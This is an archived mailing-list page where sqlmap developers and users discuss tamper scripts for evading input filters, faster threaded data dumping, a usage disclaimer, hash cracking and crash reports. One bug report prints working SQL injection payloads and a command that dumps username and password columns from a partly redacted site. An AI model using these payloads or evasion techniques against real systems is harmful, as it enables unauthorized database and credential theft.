sqlmap-users Mailing List for sqlmap (Page 93)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-05-30 16:46:23
|
Inline.. Bernardo Damele A. G. This message was sent from a smartphone On 28 May 2011, at 21:17, Giorgio Fedon <gio...@gm...> wrote: > Thankyou for pointing it out, but the post is more aimed to explain > which part of SQL to modify to change the logic. Nice blog post. Also, consider writing and using your own tamper scripts if you can. I look forward to hear feedback from you about that feature. It is of course documented in he users manual. > It was just an > example, I felt into things like need of hex encodings or other > stuff... Giorgio, feel free to request features. They well might be already in our ticketing system as may not! > in addition the preliminary checks may not work and block you > wither If you provide tamper scripts, prefix, suffix and dbms then sqlmap should do very little initial requests at the detection phase. To avoid any fingerprint request, provide --dbms with "mssql 2005" for instance. > > Giorgio > > 2011/5/28 Miroslav Stampar <mir...@gm...>: >> hi. >> >> now after last commit (added ./tamper/equaltolike.py tampering script) >> you can avoid filtering of >, < and = chars with: >> >> --tamper="between,equaltolike" >> >> kr >> >> On Sat, May 28, 2011 at 1:28 PM, Miroslav Stampar >> <mir...@gm...> wrote: >>> hi Georgio. >>> >>> we have a mechanism called "tampering" for doing this kind of things. >>> >>> e.g. for dealing with characters > and < you can try to use >>> --tamper=between which will replace standard greater/lesser than >>> characters in inference by BETWEEN operator >>> >>> kr >>> >>> On Sat, May 28, 2011 at 1:02 PM, Giorgio Fedon <gio...@gm...> wrote: >>>> Dear List, >>>> >>>> A tool cannot deal automatically with particular contexts and situations. >>>> A common reason of failure for SQL injection tools is the fact that >>>> some field are vulnerable but somehow sanitized. >>>> >>>> If fields are sanitized the Penetration tester must: >>>> 1) Understand which characters are filtered and how >>>> 2) Find how to make the blind SQL logic to work even if there are >>>> restrictions in place >>>> 3) Use a tool that can be customized with your new logic >>>> >>>> SQL is the best tool available for me (I am a strong SQLmap supporter >>>> :D) because it's yet powerful, but also fully customizable and meets >>>> perfectly these requirements. >>>> >>>> You can find the post here: >>>> http://blog.mindedsecurity.com/2011/05/customizing-sqlmap-to-bypass-weak-but.html >>>> >>>> Thank you, >>>> >>>> Giorgio Fedon >>>> >>>> ------------------------------------------------------------------------------ >>>> vRanger cuts backup time in half-while increasing security. >>>> With the market-leading solution for virtual backup and recovery, >>>> you get blazing-fast, flexible, and affordable data protection. >>>> Download your free trial now. >>>> http://p.sf.net/sfu/quest-d2dcopy1 >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>> >>> >>> >>> -- >>> Miroslav Stampar >>> >>> E-mail: miroslav.stampar (at) gmail.com >>> PGP Key ID: 0xB5397B1B >>> >> >> >> >> -- >> Miroslav Stampar >> >> E-mail: miroslav.stampar (at) gmail.com >> PGP Key ID: 0xB5397B1B >> > > ------------------------------------------------------------------------------ > vRanger cuts backup time in half-while increasing security. > With the market-leading solution for virtual backup and recovery, > you get blazing-fast, flexible, and affordable data protection. > Download your free trial now. > http://p.sf.net/sfu/quest-d2dcopy1 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: Miroslav S. <mir...@gm...> - 2011-05-30 09:48:58
|
hi all. just one news related after a long time we've launched a profiler and found one pesky little f.cker (reflective removal mechanism - regular expression usage) to short this all, you'll notice real speedups at all instances (especially UNION technique usage). this means that now with --threads and UNION/ERROR techniques there shouldn't be any real obstacles from our side (than the connection speed itself) for really really fast dumping process kr On Mon, May 30, 2011 at 4:40 AM, David Guimaraes <sk...@gm...> wrote: > Thanks guys .. this is something very useful, that I miss a lot .. I tried > here and it works like a charm. Very fast! > > On Sun, May 29, 2011 at 8:19 PM, Miroslav Stampar > <mir...@gm...> wrote: >> >> Hi all. >> >> As the title says, now you'll be able to run multithreaded UNION/ERROR >> based dumpings :) >> >> Please report any bugs you encounter. >> >> KR >> >> p.s. know issue (will do something about it) - when doing multiple >> fast Ctrl+C and after program terminates: "Exception KeyboardInterrupt >> in <module 'threading' from '...'> ignored" >> >> -- >> Miroslav Stampar >> >> E-mail: miroslav.stampar (at) gmail.com >> PGP Key ID: 0xB5397B1B >> >> >> ------------------------------------------------------------------------------ >> vRanger cuts backup time in half-while increasing security. >> With the market-leading solution for virtual backup and recovery, >> you get blazing-fast, flexible, and affordable data protection. >> Download your free trial now. >> http://p.sf.net/sfu/quest-d2dcopy1 >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > -- > David Gomes Guimarães > > ------------------------------------------------------------------------------ > vRanger cuts backup time in half-while increasing security. > With the market-leading solution for virtual backup and recovery, > you get blazing-fast, flexible, and affordable data protection. > Download your free trial now. > http://p.sf.net/sfu/quest-d2dcopy1 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: David G. <sk...@gm...> - 2011-05-30 02:41:14
|
Thanks guys .. this is something very useful, that I miss a lot .. I tried here and it works like a charm. Very fast! On Sun, May 29, 2011 at 8:19 PM, Miroslav Stampar < mir...@gm...> wrote: > Hi all. > > As the title says, now you'll be able to run multithreaded UNION/ERROR > based dumpings :) > > Please report any bugs you encounter. > > KR > > p.s. know issue (will do something about it) - when doing multiple > fast Ctrl+C and after program terminates: "Exception KeyboardInterrupt > in <module 'threading' from '...'> ignored" > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > > > ------------------------------------------------------------------------------ > vRanger cuts backup time in half-while increasing security. > With the market-leading solution for virtual backup and recovery, > you get blazing-fast, flexible, and affordable data protection. > Download your free trial now. > http://p.sf.net/sfu/quest-d2dcopy1 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- David Gomes Guimarães |
|
From: Miroslav S. <mir...@gm...> - 2011-05-29 23:19:14
|
Hi all. As the title says, now you'll be able to run multithreaded UNION/ERROR based dumpings :) Please report any bugs you encounter. KR p.s. know issue (will do something about it) - when doing multiple fast Ctrl+C and after program terminates: "Exception KeyboardInterrupt in <module 'threading' from '...'> ignored" -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-05-29 06:26:15
|
On Sun, May 29, 2011 at 2:39 AM, Chris Oakley <chr...@gm...> wrote: > Good idea. It's an unfortunate fact that professional tools such as this > can be used by the wrong hands. I doubt you'd be held responsible with or > without the disclaimer though. That said, it should read "mutual consent" > not "mutual consistency". Cheers, Chris. hi. thanks for the spot. as english is not our first language you are all more than welcome to report "language" bugs too. kr > > On 28 May 2011 19:59, Miroslav Stampar <mir...@gm...> wrote: >> >> hi all. >> >> as the current situation seems to be out of control (latest headlines) >> we need to add some kind of "disclaimer" warning you that you are >> grown ups and that you know what are you doing - it's you own (!) >> responsibility what you are doing with it. >> >> sqlmap/1.0-dev (rxxxx) - automatic SQL injection and database takeover >> tool >> http://sqlmap.sourceforge.net >> >> [!] Legal Disclaimer: usage of sqlmap for attacking web servers without >> prior mu >> tual consistency can be considered as an illegal activity. it is the final >> user' >> s responsibility to obey all applicable local, state and federal laws. >> authors a >> ssume no liability and are not responsible for any misuse or damage caused >> by th >> is program. >> >> [*] starting at: xx:xx:xx >> >> kr >> >> -- >> Miroslav Stampar >> >> E-mail: miroslav.stampar (at) gmail.com >> PGP Key ID: 0xB5397B1B >> >> >> ------------------------------------------------------------------------------ >> vRanger cuts backup time in half-while increasing security. >> With the market-leading solution for virtual backup and recovery, >> you get blazing-fast, flexible, and affordable data protection. >> Download your free trial now. >> http://p.sf.net/sfu/quest-d2dcopy1 >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Chris O. <chr...@gm...> - 2011-05-29 00:39:47
|
Good idea. It's an unfortunate fact that professional tools such as this can be used by the wrong hands. I doubt you'd be held responsible with or without the disclaimer though. That said, it should read "mutual consent" not "mutual consistency". Cheers, Chris. On 28 May 2011 19:59, Miroslav Stampar <mir...@gm...> wrote: > hi all. > > as the current situation seems to be out of control (latest headlines) > we need to add some kind of "disclaimer" warning you that you are > grown ups and that you know what are you doing - it's you own (!) > responsibility what you are doing with it. > > sqlmap/1.0-dev (rxxxx) - automatic SQL injection and database takeover > tool > http://sqlmap.sourceforge.net > > [!] Legal Disclaimer: usage of sqlmap for attacking web servers without > prior mu > tual consistency can be considered as an illegal activity. it is the final > user' > s responsibility to obey all applicable local, state and federal laws. > authors a > ssume no liability and are not responsible for any misuse or damage caused > by th > is program. > > [*] starting at: xx:xx:xx > > kr > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > > > ------------------------------------------------------------------------------ > vRanger cuts backup time in half-while increasing security. > With the market-leading solution for virtual backup and recovery, > you get blazing-fast, flexible, and affordable data protection. > Download your free trial now. > http://p.sf.net/sfu/quest-d2dcopy1 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: Giorgio F. <gio...@gm...> - 2011-05-28 20:16:26
|
Thankyou for pointing it out, but the post is more aimed to explain which part of SQL to modify to change the logic. It was just an example, I felt into things like need of hex encodings or other stuff... in addition the preliminary checks may not work and block you wither Giorgio 2011/5/28 Miroslav Stampar <mir...@gm...>: > hi. > > now after last commit (added ./tamper/equaltolike.py tampering script) > you can avoid filtering of >, < and = chars with: > > --tamper="between,equaltolike" > > kr > > On Sat, May 28, 2011 at 1:28 PM, Miroslav Stampar > <mir...@gm...> wrote: >> hi Georgio. >> >> we have a mechanism called "tampering" for doing this kind of things. >> >> e.g. for dealing with characters > and < you can try to use >> --tamper=between which will replace standard greater/lesser than >> characters in inference by BETWEEN operator >> >> kr >> >> On Sat, May 28, 2011 at 1:02 PM, Giorgio Fedon <gio...@gm...> wrote: >>> Dear List, >>> >>> A tool cannot deal automatically with particular contexts and situations. >>> A common reason of failure for SQL injection tools is the fact that >>> some field are vulnerable but somehow sanitized. >>> >>> If fields are sanitized the Penetration tester must: >>> 1) Understand which characters are filtered and how >>> 2) Find how to make the blind SQL logic to work even if there are >>> restrictions in place >>> 3) Use a tool that can be customized with your new logic >>> >>> SQL is the best tool available for me (I am a strong SQLmap supporter >>> :D) because it's yet powerful, but also fully customizable and meets >>> perfectly these requirements. >>> >>> You can find the post here: >>> http://blog.mindedsecurity.com/2011/05/customizing-sqlmap-to-bypass-weak-but.html >>> >>> Thank you, >>> >>> Giorgio Fedon >>> >>> ------------------------------------------------------------------------------ >>> vRanger cuts backup time in half-while increasing security. >>> With the market-leading solution for virtual backup and recovery, >>> you get blazing-fast, flexible, and affordable data protection. >>> Download your free trial now. >>> http://p.sf.net/sfu/quest-d2dcopy1 >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> >> >> >> -- >> Miroslav Stampar >> >> E-mail: miroslav.stampar (at) gmail.com >> PGP Key ID: 0xB5397B1B >> > > > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > |
|
From: Miroslav S. <mir...@gm...> - 2011-05-28 18:59:26
|
hi all.
as the current situation seems to be out of control (latest headlines)
we need to add some kind of "disclaimer" warning you that you are
grown ups and that you know what are you doing - it's you own (!)
responsibility what you are doing with it.
sqlmap/1.0-dev (rxxxx) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mu
tual consistency can be considered as an illegal activity. it is the final user'
s responsibility to obey all applicable local, state and federal laws. authors a
ssume no liability and are not responsible for any misuse or damage caused by th
is program.
[*] starting at: xx:xx:xx
kr
--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
|
|
From: Miroslav S. <mir...@gm...> - 2011-05-28 16:03:29
|
hi. now after last commit (added ./tamper/equaltolike.py tampering script) you can avoid filtering of >, < and = chars with: --tamper="between,equaltolike" kr On Sat, May 28, 2011 at 1:28 PM, Miroslav Stampar <mir...@gm...> wrote: > hi Georgio. > > we have a mechanism called "tampering" for doing this kind of things. > > e.g. for dealing with characters > and < you can try to use > --tamper=between which will replace standard greater/lesser than > characters in inference by BETWEEN operator > > kr > > On Sat, May 28, 2011 at 1:02 PM, Giorgio Fedon <gio...@gm...> wrote: >> Dear List, >> >> A tool cannot deal automatically with particular contexts and situations. >> A common reason of failure for SQL injection tools is the fact that >> some field are vulnerable but somehow sanitized. >> >> If fields are sanitized the Penetration tester must: >> 1) Understand which characters are filtered and how >> 2) Find how to make the blind SQL logic to work even if there are >> restrictions in place >> 3) Use a tool that can be customized with your new logic >> >> SQL is the best tool available for me (I am a strong SQLmap supporter >> :D) because it's yet powerful, but also fully customizable and meets >> perfectly these requirements. >> >> You can find the post here: >> http://blog.mindedsecurity.com/2011/05/customizing-sqlmap-to-bypass-weak-but.html >> >> Thank you, >> >> Giorgio Fedon >> >> ------------------------------------------------------------------------------ >> vRanger cuts backup time in half-while increasing security. >> With the market-leading solution for virtual backup and recovery, >> you get blazing-fast, flexible, and affordable data protection. >> Download your free trial now. >> http://p.sf.net/sfu/quest-d2dcopy1 >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-05-28 11:29:05
|
hi Georgio. we have a mechanism called "tampering" for doing this kind of things. e.g. for dealing with characters > and < you can try to use --tamper=between which will replace standard greater/lesser than characters in inference by BETWEEN operator kr On Sat, May 28, 2011 at 1:02 PM, Giorgio Fedon <gio...@gm...> wrote: > Dear List, > > A tool cannot deal automatically with particular contexts and situations. > A common reason of failure for SQL injection tools is the fact that > some field are vulnerable but somehow sanitized. > > If fields are sanitized the Penetration tester must: > 1) Understand which characters are filtered and how > 2) Find how to make the blind SQL logic to work even if there are > restrictions in place > 3) Use a tool that can be customized with your new logic > > SQL is the best tool available for me (I am a strong SQLmap supporter > :D) because it's yet powerful, but also fully customizable and meets > perfectly these requirements. > > You can find the post here: > http://blog.mindedsecurity.com/2011/05/customizing-sqlmap-to-bypass-weak-but.html > > Thank you, > > Giorgio Fedon > > ------------------------------------------------------------------------------ > vRanger cuts backup time in half-while increasing security. > With the market-leading solution for virtual backup and recovery, > you get blazing-fast, flexible, and affordable data protection. > Download your free trial now. > http://p.sf.net/sfu/quest-d2dcopy1 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Giorgio F. <gio...@gm...> - 2011-05-28 11:02:45
|
Dear List, A tool cannot deal automatically with particular contexts and situations. A common reason of failure for SQL injection tools is the fact that some field are vulnerable but somehow sanitized. If fields are sanitized the Penetration tester must: 1) Understand which characters are filtered and how 2) Find how to make the blind SQL logic to work even if there are restrictions in place 3) Use a tool that can be customized with your new logic SQL is the best tool available for me (I am a strong SQLmap supporter :D) because it's yet powerful, but also fully customizable and meets perfectly these requirements. You can find the post here: http://blog.mindedsecurity.com/2011/05/customizing-sqlmap-to-bypass-weak-but.html Thank you, Giorgio Fedon |
|
From: Miroslav S. <mir...@gm...> - 2011-05-26 14:16:31
|
hi Chris. i've just tried to do it and it's already supported from the point of dumping table content. only thing is that when column names are being dumped if you press Ctrl+C program aborts. maybe we should modify this a bit to satisfy your needs. kr On Thu, May 26, 2011 at 3:54 PM, Miroslav Stampar <mir...@gm...> wrote: > hi Chris. > > not a bad idea. we'll do it and report you back. > > kr > > On Thu, May 26, 2011 at 3:41 PM, Chris Oakley > <chr...@gm...> wrote: >> Hi there >> >> If I have set sqlmap to dump a load of tables, can I make it stop dumping >> from the current table after a while and go to the next? I'm thinking a >> ctrl+c except that this instance has been running for hours so I don't want >> to try it in case it's not right. Sometimes only a few rows from each table >> are required. >> >> Cheers >> >> Chris >> >> ------------------------------------------------------------------------------ >> vRanger cuts backup time in half-while increasing security. >> With the market-leading solution for virtual backup and recovery, >> you get blazing-fast, flexible, and affordable data protection. >> Download your free trial now. >> http://p.sf.net/sfu/quest-d2dcopy1 >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-05-26 13:54:58
|
hi Chris. not a bad idea. we'll do it and report you back. kr On Thu, May 26, 2011 at 3:41 PM, Chris Oakley <chr...@gm...> wrote: > Hi there > > If I have set sqlmap to dump a load of tables, can I make it stop dumping > from the current table after a while and go to the next? I'm thinking a > ctrl+c except that this instance has been running for hours so I don't want > to try it in case it's not right. Sometimes only a few rows from each table > are required. > > Cheers > > Chris > > ------------------------------------------------------------------------------ > vRanger cuts backup time in half-while increasing security. > With the market-leading solution for virtual backup and recovery, > you get blazing-fast, flexible, and affordable data protection. > Download your free trial now. > http://p.sf.net/sfu/quest-d2dcopy1 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-05-26 13:46:39
|
hi Dennis. thank you for your report and find it fixed in the latest commit. kr On Thu, May 26, 2011 at 1:25 PM, Dennis Hecken <ma...@8d...> wrote: > [13:24:37] [CRITICAL] unhandled exception in sqlmap/0.9, retry your run with > the latest development version from the Subversion repository. If the > exception persists, please send b > > y e-mail to sql...@li... the following text and any > information required to reproduce the bug. The developers will try to > reproduce the bug, fix it accordingl > > y and get back to you. > > sqlmap version: 0.9 (r3630) > > Python version: 2.7.1 > > Operating system: nt > > Command line: C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\sqlmap.py > -v 1 -u > ********************************************************************************************* > > Technique: None > > Back-end DBMS: None (identified) > > Traceback (most recent call last): > > File "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\sqlmap.py", line > 82, in main > > start() > > File > "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\lib\controller\controller.py", > line 311, in start > > checkStability() > > File > "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\lib\controller\checks.py", > line 659, in checkStability > > secondPage, _ = Request.queryPage(content=True) > > File > "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\lib\request\connect.py", > line 518, in queryPage > > page, headers = Connect.getPage(url=uri, get=get, post=post, > cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, > auxHeaders=auxHeaders, response=response, rais > > e404=raise404, ignoreTimeout=timeBasedCompare) > > File > "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\lib\request\connect.py", > line 207, in getPage > > requestMsg += "\n%s" % requestHeaders > > UnicodeDecodeError: 'ascii' codec can't decode byte 0xff in position 81: > ordinal not in range(128) > > ------------------------------------------------------------------------------ > vRanger cuts backup time in half-while increasing security. > With the market-leading solution for virtual backup and recovery, > you get blazing-fast, flexible, and affordable data protection. > Download your free trial now. > http://p.sf.net/sfu/quest-d2dcopy1 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Chris O. <chr...@gm...> - 2011-05-26 13:41:11
|
Hi there If I have set sqlmap to dump a load of tables, can I make it stop dumping from the current table after a while and go to the next? I'm thinking a ctrl+c except that this instance has been running for hours so I don't want to try it in case it's not right. Sometimes only a few rows from each table are required. Cheers Chris |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-05-26 13:32:01
|
I suggest we could look into the list of supported hashing algorithms by hashcat and jtr and maybe implement some of them now that we have already good coverage for the DBMS specific ones. Bernardo Damele A. G. This message was sent from a smartphone On 26 May 2011, at 10:36, Miroslav Stampar <mir...@gm...> wrote: > Hi all. > > I have a general question (mostly pointing to those I won't mention, > but use sqlmap a lot :). > > Do you want/need any other hash attack algorithm to be implemented? > > KR > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > > ------------------------------------------------------------------------------ > vRanger cuts backup time in half-while increasing security. > With the market-leading solution for virtual backup and recovery, > you get blazing-fast, flexible, and affordable data protection. > Download your free trial now. > http://p.sf.net/sfu/quest-d2dcopy1 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: Dennis H. <ma...@8d...> - 2011-05-26 11:58:27
|
[13:24:37] [CRITICAL] unhandled exception in sqlmap/0.9, retry your run with the latest development version from the Subversion repository. If the exception persists, please send b
y e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingl
y and get back to you.
sqlmap version: 0.9 (r3630)
Python version: 2.7.1
Operating system: nt
Command line: C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\sqlmap.py -v 1 -u *********************************************************************************************
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
File "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\sqlmap.py", line 82, in main
start()
File "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\lib\controller\controller.py", line 311, in start
checkStability()
File "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\lib\controller\checks.py", line 659, in checkStability
secondPage, _ = Request.queryPage(content=True)
File "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\lib\request\connect.py", line 518, in queryPage
page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, rais
e404=raise404, ignoreTimeout=timeBasedCompare)
File "C:\Users\Administrator\Downloads\sqlmap-0.9\sqlmap\lib\request\connect.py", line 207, in getPage
requestMsg += "\n%s" % requestHeaders
UnicodeDecodeError: 'ascii' codec can't decode byte 0xff in position 81: ordinal not in range(128)
|
|
From: Miroslav S. <mir...@gm...> - 2011-05-26 08:36:08
|
Hi all. I have a general question (mostly pointing to those I won't mention, but use sqlmap a lot :). Do you want/need any other hash attack algorithm to be implemented? KR -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-05-26 08:19:04
|
hi Vinicius. thank you for your report. this resulted in a commit with few related "stability" patches (a.k.a. "None crashes"). so, with the last commit your problem should be solved. still, i am not sure why there was a 404: "[19:35:15] [INFO] the SQL query used returns 3 entries [19:35:15] [CRITICAL] connection exception detected. sqlmap will display partial output'page not found (404)'" if you think that was sqlmap's fault you can contact me privately with some more info. kr 2011/5/26 Vinícius ~ <vin...@gm...>: > ./sqlmap.py -u "http://[snip]/Poll.aspx?id=10" -T usuario -C > USUA_NO_USUARIO,USUA_ID_USUARIO,USUA_DE_SENHA --dump > > sqlmap/1.0-dev (r3952) - automatic SQL injection and database takeover > tool > http://sqlmap.sourceforge.net > > [*] starting at: 19:35:11 > > [19:35:11] [INFO] using '/home/sqlmap-dev/output/[snip]/session' as session > file > [19:35:11] [INFO] resuming injection data from session file > [19:35:11] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from > session file > [19:35:11] [INFO] testing connection to the target url > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: id > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: id=10 AND 3888=3888 > > Type: error-based > Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING > clause > Payload: id=10 AND > 3759=CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(118)+CHAR(122)+CHAR(58)+(SELECT > (CASE WHEN (3759=3759) THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(58)+CHAR(109)+CHAR(106)+CHAR(107)+CHAR(58))) > > Type: stacked queries > Title: Microsoft SQL Server/Sybase stacked queries > Payload: id=10; WAITFOR DELAY '0:0:5';-- > > Type: AND/OR time-based blind > Title: Microsoft SQL Server/Sybase time-based blind > Payload: id=10 WAITFOR DELAY '0:0:5'-- > --- > > [19:35:12] [INFO] for manual usage GET and POST payloads require url > encoding > [19:35:12] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows Vista > web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0 > back-end DBMS: Microsoft SQL Server 2005 > [19:35:12] [WARNING] missing database parameter, sqlmap is going to use the > current database to enumerate table(s) entries > [19:35:12] [INFO] fetching current database > [19:35:12] [INFO] read from file '/home/[snip]/session': [snip] > do you want to use LIKE operator to retrieve column names similar to the > ones provided with the -C option? [Y/n] n > [19:35:14] [INFO] fetching columns 'USUA_NO_USUARIO, USUA_ID_USUARIO, > USUA_DE_SENHA' for table 'dbo.usuario' on database 'Club' > [19:35:15] [INFO] the SQL query used returns 3 entries > [19:35:15] [CRITICAL] connection exception detected. sqlmap will display > partial output'page not found (404)' > [19:35:16] [WARNING] HTTP error codes detected during testing: > 404 (Not Found) - 1 times, 500 (Internal Server Error) - 3 times > > [19:35:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3952), retry > your run with the latest development version from the Subversion repository. > If the exception persists, please send by e-mail to > sql...@li... the following text and any information > required to reproduce the bug. The developers will try to reproduce the bug, > fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r3952) > Python version: 2.6.6 > Operating system: posix > Command line: ./sqlmap.py -u > ************************************************************ -T usuario -C > ********************************************* --dump > Technique: ERROR > Back-end DBMS: Microsoft SQL Server (fingerprinted) > Traceback (most recent call last): > File "./sqlmap.py", line 84, in main > start() > File "/home/sqlmap-dev/lib/controller/controller.py", line 526, in start > action() > File "/home/sqlmap-dev/lib/controller/action.py", line 109, in action > conf.dbmsHandler.dumpTable() > File "/home/sqlmap-dev/plugins/generic/enumeration.py", line 1470, in > dumpTable > self.getColumns(onlyColNames=True) > File "/home/sqlmap-dev/plugins/generic/enumeration.py", line 1081, in > getColumns > if columnData[0] is not None: > TypeError: 'NoneType' object is unsubscriptable > > [*] shutting down at: 19:35:1 > > - > Thanx! > > ------------------------------------------------------------------------------ > vRanger cuts backup time in half-while increasing security. > With the market-leading solution for virtual backup and recovery, > you get blazing-fast, flexible, and affordable data protection. > Download your free trial now. > 